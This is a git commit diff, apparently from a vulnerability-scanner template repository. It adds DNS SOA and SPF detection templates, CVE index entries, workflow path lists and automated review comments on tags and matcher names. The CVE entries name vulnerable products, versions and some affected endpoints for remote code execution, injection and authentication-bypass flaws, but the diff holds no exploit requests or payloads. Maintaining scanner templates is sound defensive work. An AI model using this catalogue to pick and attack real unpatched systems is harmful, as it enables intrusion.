Merge branch 'main' into fuzzing-templates

patch-1
Sandeep Singh 2024-03-22 22:49:03 +05:30 committed by GitHub
commit 3c9125f3ed
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194
58 changed files with 860 additions and 134 deletions


@ -3,6 +3,9 @@ on:
push:
paths:
- '.new-additions'
- 'dns/soa-detect.yaml'
- 'dns/spf-record-detect.yaml'
- 'dns/txt-service-detect.yaml'
- 'file/keys/dependency/dependency-track.yaml'
- 'file/keys/docker/dockerhub-pat.yaml'
- 'file/keys/doppler/doppler-audit.yaml'
@ -32,7 +35,9 @@ on:
- 'http/cves/2023/CVE-2023-49785.yaml'
- 'http/cves/2023/CVE-2023-5830.yaml'
- 'http/cves/2023/CVE-2023-5914.yaml'
- 'http/cves/2024/CVE-2024-1212.yaml'
- 'http/cves/2024/CVE-2024-1698.yaml'
- 'http/cves/2024/CVE-2024-27954.yaml'
- 'http/exposed-panels/bynder-panel.yaml'
- 'http/exposed-panels/cisco/cisco-expressway-panel.yaml'
- 'http/exposed-panels/emqx-panel.yaml'
@ -42,11 +47,14 @@ on:
- 'http/exposed-panels/osnexus-panel.yaml'
- 'http/exposed-panels/posteio-admin-panel.yaml'
- 'http/exposed-panels/skeepers-panel.yaml'
- 'http/exposures/files/generic-db.yaml'
- 'http/misconfiguration/installer/posteio-installer.yaml'
- 'http/osint/phishing/kakao-login-phish.yaml'
- 'http/osint/phishing/naver-login-phish.yaml'
- 'http/technologies/directus-detect.yaml'
- 'http/technologies/microsoft/aspnet-version-detect.yaml'
- 'http/technologies/microsoft/aspnetmvc-version-disclosure.yaml'
- 'http/technologies/wing-ftp-service-detect.yaml'
- 'http/vulnerabilities/landray/landray-eis-ws-infoleak.yaml'
- 'network/detection/wing-ftp-detect.yaml'
workflow_dispatch:


@ -1,3 +1,6 @@
dns/soa-detect.yaml
dns/spf-record-detect.yaml
dns/txt-service-detect.yaml
file/keys/dependency/dependency-track.yaml
file/keys/docker/dockerhub-pat.yaml
file/keys/doppler/doppler-audit.yaml
@ -27,7 +30,9 @@ file/keys/wireguard/wireguard-private.yaml
http/cves/2023/CVE-2023-49785.yaml
http/cves/2023/CVE-2023-5830.yaml
http/cves/2023/CVE-2023-5914.yaml
http/cves/2024/CVE-2024-1212.yaml
http/cves/2024/CVE-2024-1698.yaml
http/cves/2024/CVE-2024-27954.yaml
http/exposed-panels/bynder-panel.yaml
http/exposed-panels/cisco/cisco-expressway-panel.yaml
http/exposed-panels/emqx-panel.yaml
@ -37,10 +42,13 @@ http/exposed-panels/neocase-hrportal-panel.yaml
http/exposed-panels/osnexus-panel.yaml
http/exposed-panels/posteio-admin-panel.yaml
http/exposed-panels/skeepers-panel.yaml
http/exposures/files/generic-db.yaml
http/misconfiguration/installer/posteio-installer.yaml
http/osint/phishing/kakao-login-phish.yaml
http/osint/phishing/naver-login-phish.yaml
http/technologies/directus-detect.yaml
http/technologies/microsoft/aspnet-version-detect.yaml
http/technologies/microsoft/aspnetmvc-version-disclosure.yaml
http/technologies/wing-ftp-service-detect.yaml
http/vulnerabilities/landray/landray-eis-ws-infoleak.yaml
network/detection/wing-ftp-detect.yaml


@ -9,7 +9,7 @@ info:
metadata:
verified: true
max-request: 1
tags: cloud,cloud-enum,azure,bruteforce,enum
tags: cloud,cloud-enum,azure,fuzz,enum
self-contained: true
@ -63,4 +63,4 @@ dns:
part: answer
words:
- "IN\tA"
# digest: 4a0a00473045022100ad529d9d011c813ce7e0cb419a8440ca3f0bef3ca063b85560dbc678d6eb7056022022aa46f55179a7b72c6a02dcda0444e0aba98ddaa781c8118d39acd5cafdeaaf:922c64590222798bb761d5b6d8e72950
# digest: 490a0046304402200614bd35195e042742d9840244b46d9f68e4918956d5672a7549edaedbfe5f2e022051271716ac72339c39f76569585c0a256b19ce6238da5e3ea6a9d36b2d80011e:922c64590222798bb761d5b6d8e72950
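Review bot: Swapping the `bruteforce` tag for `fuzz` in the first hunk changes which scans select this template, and nothing on the page says that is intended. Anyone who includes or excludes templates by the `bruteforce` tag silently gains or loses this Azure enumeration check, and if the project's default ignore list excludes `fuzz` (worth confirming) the template would drop out of default runs altogether. If both selections should keep working, the line can carry both tags: `tags: cloud,cloud-enum,azure,bruteforce,fuzz,enum`. The template body lies outside both hunks, so whether it is a wordlist-driven DNS lookup rather than input fuzzing could not be checked here.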


@ -1386,7 +1386,7 @@
{"ID":"CVE-2021-40149","Info":{"Name":"Reolink E1 Zoom Camera \u003c=3.0.0.716 - Private Key Disclosure","Severity":"medium","Description":"Reolink E1 Zoom Camera versions 3.0.0.716 and below suffer from a private key (RSA) disclosure vulnerability.\n","Classification":{"CVSSScore":"5.9"}},"file_path":"http/cves/2021/CVE-2021-40149.yaml"}
{"ID":"CVE-2021-40150","Info":{"Name":"Reolink E1 Zoom Camera \u003c=3.0.0.716 - Information Disclosure","Severity":"high","Description":"Reolink E1 Zoom camera through 3.0.0.716 is susceptible to information disclosure. The web server discloses its configuration via the /conf/ directory that is mapped to a publicly accessible path. An attacker with network-level access to the camera can can download the entire NGINX/FastCGI configurations by querying the /conf/nginx.conf or /conf/fastcgi.conf URI.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2021/CVE-2021-40150.yaml"}
{"ID":"CVE-2021-40323","Info":{"Name":"Cobbler \u003c3.3.0 - Remote Code Execution","Severity":"critical","Description":"Cobbler before 3.3.0 allows log poisoning and resultant remote code execution via an XMLRPC method.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2021/CVE-2021-40323.yaml"}
{"ID":"CVE-2021-40438","Info":{"Name":"Apache \u003c= 2.4.48 - Mod_Proxy SSRF","Severity":"critical","Description":"Apache 2.4.48 and below contain an issue where uri-path can cause mod_proxy to forward the request to an origin server chosen by the remote user.","Classification":{"CVSSScore":"9"}},"file_path":"http/cves/2021/CVE-2021-40438.yaml"}
{"ID":"CVE-2021-40438","Info":{"Name":"Apache \u003c= 2.4.48 Mod_Proxy - Server-Side Request Forgery","Severity":"critical","Description":"Apache 2.4.48 and below contain an issue where uri-path can cause mod_proxy to forward the request to an origin server chosen by the remote user.","Classification":{"CVSSScore":"9"}},"file_path":"http/cves/2021/CVE-2021-40438.yaml"}
{"ID":"CVE-2021-40539","Info":{"Name":"Zoho ManageEngine ADSelfService Plus v6113 - Unauthenticated Remote Command Execution","Severity":"critical","Description":"Zoho ManageEngine ADSelfService Plus version 6113 and prior are vulnerable to a REST API authentication bypass vulnerability that can lead to remote code execution.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2021/CVE-2021-40539.yaml"}
{"ID":"CVE-2021-40542","Info":{"Name":"Opensis-Classic 8.0 - Cross-Site Scripting","Severity":"medium","Description":"Opensis-Classic Version 8.0 is affected by cross-site scripting. An unauthenticated user can inject and execute JavaScript code through the link_url parameter in Ajax_url_encode.php.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2021/CVE-2021-40542.yaml"}
{"ID":"CVE-2021-40651","Info":{"Name":"OS4Ed OpenSIS Community 8.0 - Local File Inclusion","Severity":"medium","Description":"OS4Ed OpenSIS Community 8.0 is vulnerable to a local file inclusion vulnerability in Modules.php (modname parameter), which can disclose arbitrary file from the server's filesystem as long as the application has access to the file.\n","Classification":{"CVSSScore":"6.5"}},"file_path":"http/cves/2021/CVE-2021-40651.yaml"}
@ -2171,7 +2171,7 @@
{"ID":"CVE-2023-37728","Info":{"Name":"IceWarp Webmail Server v10.2.1 - Cross Site Scripting","Severity":"medium","Description":"Icewarp Icearp v10.2.1 was discovered to contain a cross-site scripting (XSS) vulnerability via the color parameter.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-37728.yaml"}
{"ID":"CVE-2023-37979","Info":{"Name":"Ninja Forms \u003c 3.6.26 - Cross-Site Scripting","Severity":"medium","Description":"The plugin does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-37979.yaml"}
{"ID":"CVE-2023-38035","Info":{"Name":"Ivanti Sentry - Authentication Bypass","Severity":"critical","Description":"A security vulnerability in MICS Admin Portal in Ivanti MobileIron Sentry versions 9.18.0 and below, which may allow an attacker to bypass authentication controls on the administrative interface due to an insufficiently restrictive Apache HTTPD configuration.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-38035.yaml"}
{"ID":"CVE-2023-38203","Info":{"Name":"Adobe ColdFusion Deserialization of Untrusted Data","Severity":"critical","Description":"Adobe ColdFusion versions 2018u17 (and earlier), 2021u7 (and earlier) and 2023u1 (and earlier) are affected by a Deserialization of Untrusted Data vulnerability that could result in Arbitrary code execution. Exploitation of this issue does not require user interaction.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-38203.yaml"}
{"ID":"CVE-2023-38203","Info":{"Name":"Adobe ColdFusion - Deserialization of Untrusted Data","Severity":"critical","Description":"Adobe ColdFusion versions 2018u17 (and earlier), 2021u7 (and earlier) and 2023u1 (and earlier) are affected by a Deserialization of Untrusted Data vulnerability that could result in Arbitrary code execution. Exploitation of this issue does not require user interaction.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-38203.yaml"}
{"ID":"CVE-2023-38205","Info":{"Name":"Adobe ColdFusion - Access Control Bypass","Severity":"high","Description":"There is an access control bypass vulnerability in Adobe ColdFusion versions 2023 Update 2 and below, 2021 Update 8 and below and 2018 update 18 and below, which allows a remote attacker to bypass the ColdFusion mechanisms that restrict unauthenticated external access to ColdFusion's Administrator.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-38205.yaml"}
{"ID":"CVE-2023-3836","Info":{"Name":"Dahua Smart Park Management - Arbitrary File Upload","Severity":"critical","Description":"Dahua wisdom park integrated management platform is a comprehensive management platform, a park operations,resource allocation, and intelligence services,and other functions, including/emap/devicePoint_addImgIco?.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-3836.yaml"}
{"ID":"CVE-2023-3843","Info":{"Name":"mooDating 1.2 - Cross-site scripting","Severity":"medium","Description":"A vulnerability was found in mooSocial mooDating 1.2. It has been classified as problematic. Affected is an unknown function of the file /matchmakings/question of the component URL Handler. The manipulation leads to cross site scripting. It is possible to launch the attack remotely. VDB-235194 is the identifier assigned to this vulnerability. NOTE: We tried to contact the vendor early about the disclosure but the official mail address was not working properly.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-3843.yaml"}
@ -2227,6 +2227,7 @@
{"ID":"CVE-2023-42442","Info":{"Name":"JumpServer \u003e 3.6.4 - Information Disclosure","Severity":"medium","Description":"JumpServer is an open source bastion host and a professional operation and maintenance security audit system. Starting in version 3.0.0 and prior to versions 3.5.5 and 3.6.4, session replays can download without authentication. Session replays stored in S3, OSS, or other cloud storage are not affected. The api `/api/v1/terminal/sessions/` permission control is broken and can be accessed anonymously. SessionViewSet permission classes set to `[RBACPermission | IsSessionAssignee]`, relation is or, so any permission matched will be allowed. Versions 3.5.5 and 3.6.4 have a fix. After upgrading, visit the api `$HOST/api/v1/terminal/sessions/?limit=1`. The expected http response code is 401 (`not_authenticated`).\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2023/CVE-2023-42442.yaml"}
{"ID":"CVE-2023-42793","Info":{"Name":"JetBrains TeamCity \u003c 2023.05.4 - Remote Code Execution","Severity":"critical","Description":"In JetBrains TeamCity before 2023.05.4 authentication bypass leading to RCE on TeamCity Server was possible\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-42793.yaml"}
{"ID":"CVE-2023-43177","Info":{"Name":"CrushFTP \u003c 10.5.1 - Unauthenticated Remote Code Execution","Severity":"critical","Description":"CrushFTP prior to 10.5.1 is vulnerable to Improperly Controlled Modification of Dynamically-Determined Object Attributes.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-43177.yaml"}
{"ID":"CVE-2023-43187","Info":{"Name":"NodeBB XML-RPC Request xmlrpc.php - XML Injection","Severity":"critical","Description":"A remote code execution (RCE) vulnerability in the xmlrpc.php endpoint of NodeBB Inc NodeBB forum software prior to v1.18.6 allows attackers to execute arbitrary code via crafted XML-RPC requests.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-43187.yaml"}
{"ID":"CVE-2023-43261","Info":{"Name":"Milesight Routers - Information Disclosure","Severity":"high","Description":"A critical security vulnerability has been identified in Milesight Industrial Cellular Routers, compromising the security of sensitive credentials and permitting unauthorized access. This vulnerability stems from a misconfiguration that results in directory listing being enabled on the router systems, rendering log files publicly accessible. These log files, while containing sensitive information such as admin and other user passwords (encrypted as a security measure), can be exploited by attackers via the router's web interface. The presence of a hardcoded AES secret key and initialization vector (IV) in the JavaScript code further exacerbates the situation, facilitating the decryption of these passwords. This chain of vulnerabilities allows malicious actors to gain unauthorized access to the router.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-43261.yaml"}
{"ID":"CVE-2023-43325","Info":{"Name":"MooSocial 3.1.8 - Cross-Site Scripting","Severity":"medium","Description":"A reflected cross-site scripting (XSS) vulnerability exisits in the data[redirect_url] parameter on user login function of mooSocial v3.1.8 which allows attackers to steal user's session cookies and impersonate their account via a crafted URL.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-43325.yaml"}
{"ID":"CVE-2023-43326","Info":{"Name":"MooSocial 3.1.8 - Cross-Site Scripting","Severity":"medium","Description":"A reflected cross-site scripting (XSS) vulnerability exisits in multiple url of mooSocial v3.1.8 which allows attackers to steal user's session cookies and impersonate their account via a crafted URL.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-43326.yaml"}
@ -2257,8 +2258,10 @@
{"ID":"CVE-2023-49103","Info":{"Name":"OwnCloud - Phpinfo Configuration","Severity":"high","Description":"An issue was discovered in ownCloud owncloud/graphapi 0.2.x before 0.2.1 and 0.3.x before 0.3.1. The graphapi app relies on a third-party GetPhpInfo.php library that provides a URL. When this URL is accessed, it reveals the configuration details of the PHP environment (phpinfo). This information includes all the environment variables of the webserver. In containerized deployments, these environment variables may include sensitive data such as the ownCloud admin password, mail server credentials, and license key. Simply disabling the graphapi app does not eliminate the vulnerability. Additionally, phpinfo exposes various other potentially sensitive configuration details that could be exploited by an attacker to gather information about the system.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-49103.yaml"}
{"ID":"CVE-2023-4966","Info":{"Name":"Citrix Bleed - Leaking Session Tokens","Severity":"high","Description":"Sensitive information disclosure in NetScaler ADC and NetScaler Gateway when configured as a Gateway (VPN virtual server, ICA Proxy, CVPN, RDP Proxy) or AAA ?virtual?server.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-4966.yaml"}
{"ID":"CVE-2023-4974","Info":{"Name":"Academy LMS 6.2 - SQL Injection","Severity":"critical","Description":"A vulnerability was found in Academy LMS 6.2. It has been rated as critical. Affected by this issue is some unknown functionality of the file /academy/tutor/filter of the component GET Parameter Handler. The manipulation of the argument price_min/price_max leads to sql injection. The attack may be launched remotely. VDB-239750 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-4974.yaml"}
{"ID":"CVE-2023-49785","Info":{"Name":"ChatGPT-Next-Web - SSRF/XSS","Severity":"critical","Description":"Full-Read SSRF/XSS in NextChat, aka ChatGPT-Next-Web\n","Classification":{"CVSSScore":"9.1"}},"file_path":"http/cves/2023/CVE-2023-49785.yaml"}
{"ID":"CVE-2023-50290","Info":{"Name":"Apache Solr - Host Environment Variables Leak via Metrics API","Severity":"medium","Description":"Exposure of Sensitive Information to an Unauthorized Actor Vulnerability in Apache Solr.\nThe Solr Metrics API publishes all unprotected environment variables available to each Apache Solr instance. Users can specify which environment variables to hide, however, the default list is designed to work for known secret Java system properties. Environment variables cannot be strictly defined in Solr, like Java system properties can be, and may be set for the entire host,unlike Java system properties which are set per-Java-proccess.\n","Classification":{"CVSSScore":"6.5"}},"file_path":"http/cves/2023/CVE-2023-50290.yaml"}
{"ID":"CVE-2023-5074","Info":{"Name":"D-Link D-View 8 v2.0.1.28 - Authentication Bypass","Severity":"critical","Description":"Use of a static key to protect a JWT token used in user authentication can allow an for an authentication bypass in D-Link D-View 8 v2.0.1.28\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-5074.yaml"}
{"ID":"CVE-2023-5089","Info":{"Name":"Defender Security \u003c 4.1.0 - Protection Bypass (Hidden Login Page)","Severity":"medium","Description":"The Defender Security WordPress plugin before 4.1.0 does not prevent redirects to the login page via the auth_redirect WordPress function, allowing an unauthenticated visitor to access the login page, even when the hide login page functionality of the plugin is enabled.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2023/CVE-2023-5089.yaml"}
{"ID":"CVE-2023-50917","Info":{"Name":"MajorDoMo thumb.php - OS Command Injection","Severity":"critical","Description":"MajorDoMo (aka Major Domestic Module) before 0662e5e allows command execution via thumb.php shell metacharacters. NOTE: this is unrelated to the Majordomo mailing-list manager.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-50917.yaml"}
{"ID":"CVE-2023-50968","Info":{"Name":"Apache OFBiz \u003c 18.12.11 - Server Side Request Forgery","Severity":"high","Description":"Arbitrary file properties reading vulnerability in Apache Software Foundation Apache OFBiz when user operates an uri call without authorizations. The same uri can be operated to realize a SSRF attack also without authorizations. Users are recommended to upgrade to version 18.12.11, which fixes this issue.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-50968.yaml"}
{"ID":"CVE-2023-51467","Info":{"Name":"Apache OFBiz \u003c 18.12.11 - Remote Code Execution","Severity":"critical","Description":"The vulnerability allows attackers to bypass authentication to achieve a simple Server-Side Request Forgery (SSRF)\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-51467.yaml"}
@ -2267,6 +2270,8 @@
{"ID":"CVE-2023-5360","Info":{"Name":"WordPress Royal Elementor Addons Plugin \u003c= 1.3.78 - Arbitrary File Upload","Severity":"critical","Description":"Arbitrary File Upload vulnerability in WordPress Royal Elementor Addons Plugin. This could allow a malicious actor to upload any type of file to your website. This can include backdoors which are then executed to gain further access to your website. This vulnerability has been fixed in version 1.3.79\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-5360.yaml"}
{"ID":"CVE-2023-5375","Info":{"Name":"Mosparo \u003c 1.0.2 - Open Redirect","Severity":"medium","Description":"Open Redirect in GitHub repository mosparo/mosparo prior to 1.0.2.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-5375.yaml"}
{"ID":"CVE-2023-5556","Info":{"Name":"Structurizr on-premises - Cross Site Scripting","Severity":"medium","Description":"Cross-site Scripting (XSS) - Reflected in GitHub repository structurizr/onpremises prior to 3194.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-5556.yaml"}
{"ID":"CVE-2023-5830","Info":{"Name":"ColumbiaSoft DocumentLocator - Improper Authentication","Severity":"critical","Description":"Instances of ColumbiaSoft's Document Locator prior to version 7.2 SP4 and 2021.1 are vulnerable to an Improper Authentication/SSRF vulnerability. This template identifies vulnerable instances of the ColumbiaSoft Document Locater application by confirming external DNS interaction/lookups by modifying the value of the client-side SERVER parameter at /api/authentication/login.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-5830.yaml"}
{"ID":"CVE-2023-5914","Info":{"Name":"Citrix StoreFront - Cross-Site Scripting","Severity":"medium","Description":"Reflected Cross-Site Scripting issue which is exploitable without authentication. This vulnerability was exploitable through coercing an error message during an XML parsing procedure in the SSO flow.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-5914.yaml"}
{"ID":"CVE-2023-6018","Info":{"Name":"Mlflow - Arbitrary File Write","Severity":"critical","Description":"An attacker can overwrite any file on the server hosting MLflow without any authentication.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-6018.yaml"}
{"ID":"CVE-2023-6020","Info":{"Name":"Ray Static File - Local File Inclusion","Severity":"high","Description":"LFI in Ray's /static/ directory allows attackers to read any file on the server without authentication.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-6020.yaml"}
{"ID":"CVE-2023-6021","Info":{"Name":"Ray API - Local File Inclusion","Severity":"high","Description":"LFI in Ray's log API endpoint allows attackers to read any file on the server without authentication.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-6021.yaml"}
@ -2295,6 +2300,8 @@
{"ID":"CVE-2024-1208","Info":{"Name":"LearnDash LMS \u003c 4.10.3 - Sensitive Information Exposure","Severity":"medium","Description":"The LearnDash LMS plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 4.10.2 via API. This makes it possible for unauthenticated attackers to obtain access to quiz questions.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2024/CVE-2024-1208.yaml"}
{"ID":"CVE-2024-1209","Info":{"Name":"LearnDash LMS \u003c 4.10.2 - Sensitive Information Exposure via assignments","Severity":"medium","Description":"The LearnDash LMS plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 4.10.1 via direct file access due to insufficient protection of uploaded assignments. This makes it possible for unauthenticated attackers to obtain those uploads.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2024/CVE-2024-1209.yaml"}
{"ID":"CVE-2024-1210","Info":{"Name":"LearnDash LMS \u003c 4.10.2 - Sensitive Information Exposure","Severity":"medium","Description":"The LearnDash LMS plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 4.10.1 via API. This makes it possible for unauthenticated attackers to obtain access to quizzes.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2024/CVE-2024-1210.yaml"}
{"ID":"CVE-2024-1212","Info":{"Name":"Progress Kemp LoadMaster - Command Injection","Severity":"critical","Description":"Unauthenticated remote attackers can access the system through the LoadMaster management interface, enabling arbitrary system command execution.\n","Classification":{"CVSSScore":"10"}},"file_path":"http/cves/2024/CVE-2024-1212.yaml"}
{"ID":"CVE-2024-1698","Info":{"Name":"NotificationX \u003c= 2.8.2 - SQL Injection","Severity":"critical","Description":"The NotificationX - Best FOMO, Social Proof, WooCommerce Sales Popup \u0026 Notification Bar Plugin With Elementor plugin for WordPress is vulnerable to SQL Injection via the 'type' parameter in all versions up to, and including, 2.8.2 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-1698.yaml"}
{"ID":"CVE-2024-1709","Info":{"Name":"ConnectWise ScreenConnect 23.9.7 - Authentication Bypass","Severity":"critical","Description":"ConnectWise ScreenConnect 23.9.7 and prior are affected by an Authentication Bypass Using an Alternate Path or Channel vulnerability, which may allow an attacker direct access to confidential information or critical systems.\n","Classification":{"CVSSScore":"10.0"}},"file_path":"http/cves/2024/CVE-2024-1709.yaml"}
{"ID":"CVE-2024-21644","Info":{"Name":"pyLoad Flask Config - Access Control","Severity":"high","Description":"pyLoad is the free and open-source Download Manager written in pure Python. Any unauthenticated user can browse to a specific URL to expose the Flask config, including the `SECRET_KEY` variable. This issue has been patched in version 0.5.0b3.dev77.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2024/CVE-2024-21644.yaml"}
{"ID":"CVE-2024-21645","Info":{"Name":"pyload - Log Injection","Severity":"medium","Description":"A log injection vulnerability was identified in pyload. This vulnerability allows any unauthenticated actor to inject arbitrary messages into the logs gathered by pyload.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2024/CVE-2024-21645.yaml"}
@ -2307,6 +2314,9 @@
{"ID":"CVE-2024-25600","Info":{"Name":"Unauthenticated Remote Code Execution Bricks \u003c= 1.9.6","Severity":"critical","Description":"Bricks Builder is a popular WordPress development theme with approximately 25,000 active installations. It provides an intuitive drag-and-drop interface for designing and building WordPress websites. Bricks \u003c= 1.9.6 is vulnerable to unauthenticated remote code execution (RCE) which means that anybody can run arbitrary commands and take over the site/server. This can lead to various malicious activities\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-25600.yaml"}
{"ID":"CVE-2024-25669","Info":{"Name":"CaseAware a360inc - Cross-Site Scripting","Severity":"medium","Description":"a360inc CaseAware contains a reflected cross-site scripting vulnerability via the user parameter transmitted in the login.php query string. This is a bypass of the fix reported in CVE-2017-\u003e\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2024/CVE-2024-25669.yaml"}
{"ID":"CVE-2024-25735","Info":{"Name":"WyreStorm Apollo VX20 - Information Disclosure","Severity":"high","Description":"An issue was discovered on WyreStorm Apollo VX20 devices before 1.3.58. Remote attackers can discover cleartext credentials for the SoftAP (access point) Router /device/config using an HTTP GET request.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-25735.yaml"}
{"ID":"CVE-2024-27198","Info":{"Name":"TeamCity \u003c 2023.11.4 - Authentication Bypass","Severity":"critical","Description":"In JetBrains TeamCity before 2023.11.4 authentication bypass allowing to perform admin actions was possible\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-27198.yaml"}
{"ID":"CVE-2024-27199","Info":{"Name":"TeamCity \u003c 2023.11.4 - Authentication Bypass","Severity":"high","Description":"In JetBrains TeamCity before 2023.11.4 path traversal allowing to perform limited admin actions was possible\n","Classification":{"CVSSScore":"7.3"}},"file_path":"http/cves/2024/CVE-2024-27199.yaml"}
{"ID":"CVE-2024-27497","Info":{"Name":"Linksys E2000 1.0.06 position.js Improper Authentication","Severity":"high","Description":"Linksys E2000 Ver.1.0.06 build 1 is vulnerable to authentication bypass via the position.js file.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-27497.yaml"}
{"ID":"CVE-2001-1473","Info":{"Name":"Deprecated SSHv1 Protocol Detection","Severity":"high","Description":"SSHv1 is deprecated and has known cryptographic issues.","Classification":{"CVSSScore":"7.5"}},"file_path":"network/cves/2001/CVE-2001-1473.yaml"}
{"ID":"CVE-2011-2523","Info":{"Name":"VSFTPD 2.3.4 - Backdoor Command Execution","Severity":"critical","Description":"VSFTPD v2.3.4 had a serious backdoor vulnerability allowing attackers to execute arbitrary commands on the server with root-level access. The backdoor was triggered by a specific string of characters in a user login request, which allowed attackers to execute any command they wanted.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"network/cves/2011/CVE-2011-2523.yaml"}
{"ID":"CVE-2015-3306","Info":{"Name":"ProFTPd - Remote Code Execution","Severity":"critical","Description":"ProFTPD 1.3.5 contains a remote code execution vulnerability via the mod_copy module which allows remote attackers to read and write to arbitrary files via the site cpfr and site cpto commands.","Classification":{"CVSSScore":"10"}},"file_path":"network/cves/2015/CVE-2015-3306.yaml"}


@ -1 +1 @@
d1c0809e63305403ca431401cfcebe07
0718093f8377862f2723b488bb15e23a

84
dns/soa-detect.yaml Normal file

@ -0,0 +1,84 @@
id: soa-detect
info:
name: SOA Record Service - Detection
author: rxerium
severity: info
description: |
Detects which domain provider a domain is using, detected through SOA records
reference:
- https://www.cloudflare.com/learning/dns/dns-records/dns-soa-record/
metadata:
max-request: 1
verified: true
tags: dns,soa
dns:
- name: "{{FQDN}}"
type: SOA
matchers-condition: or
matchers:
- type: word
name: "cloudflare"
words:
- "dns.cloudflare.com"
- type: word
name: "amazon-web-services"
words:
- "awsdns"
- type: word
name: "akamai"
words:
- "hostmaster.akamai.com"
- type: word
name: "azure"
words:
- "azure-dns.com"
- type: word
name: "ns1"
words:
- "nsone.net"
- type: word
name: "verizon"
words:
- "verizon.com"
- type: word
name: "google-cloud-platform"
words:
- "googledomains.com"
- "google.com"
- type: word
name: "alibaba"
words:
- "alibabadns.com"
- type: word
name: "safeway"
words:
- "safeway.com"
- type: word
name: "mark-monitor"
words:
- "markmonitor.com"
- "markmonitor.zone"
- type: word
name: "hetznet"
words:
- "hetzner.com"
- type: word
name: "edge-cast"
words:
- "edgecastdns.net"
# digest: 4a0a00473045022052cc795314a697081c68e82277bf2be22ff53410f9a9a69af759ecefcd5b235b022100f94a899ec64709bb1f7d4e648dc091ee40029b754e4cc451882f0ccb68ff4921:922c64590222798bb761d5b6d8e72950
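Review bot: The matcher named `hetznet` looks like a typo for the `hetzner.com` string it matches; matcher names show up in results, so it should read `name: "hetzner"`. None of the matchers set a `part`, unlike the Azure template in this commit which uses `part: answer`; if the default part includes the question section (to be confirmed), scanning `verizon.com`, `safeway.com` or any name containing `google.com` would match on the queried name itself rather than on the SOA data. Adding `part: answer` to each matcher, and matching on the provider's nameserver or mailbox host rather than a bare domain, would cut those false attributions. The `google.com` word under `google-cloud-platform` also labels every Google-operated zone as GCP, which overstates what the record shows.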


@ -0,0 +1,25 @@
id: spf-record-detect
info:
name: SPF Record - Detection
author: rxerium
severity: info
description: |
An SPF TXT record was detected
reference:
- https://www.mimecast.com/content/how-to-create-an-spf-txt-record
tags: dns,spf
dns:
- name: "{{FQDN}}"
type: TXT
matchers:
- type: word
words:
- "v=spf1"
extractors:
- type: regex
regex:
- "v=spf1(.+)"
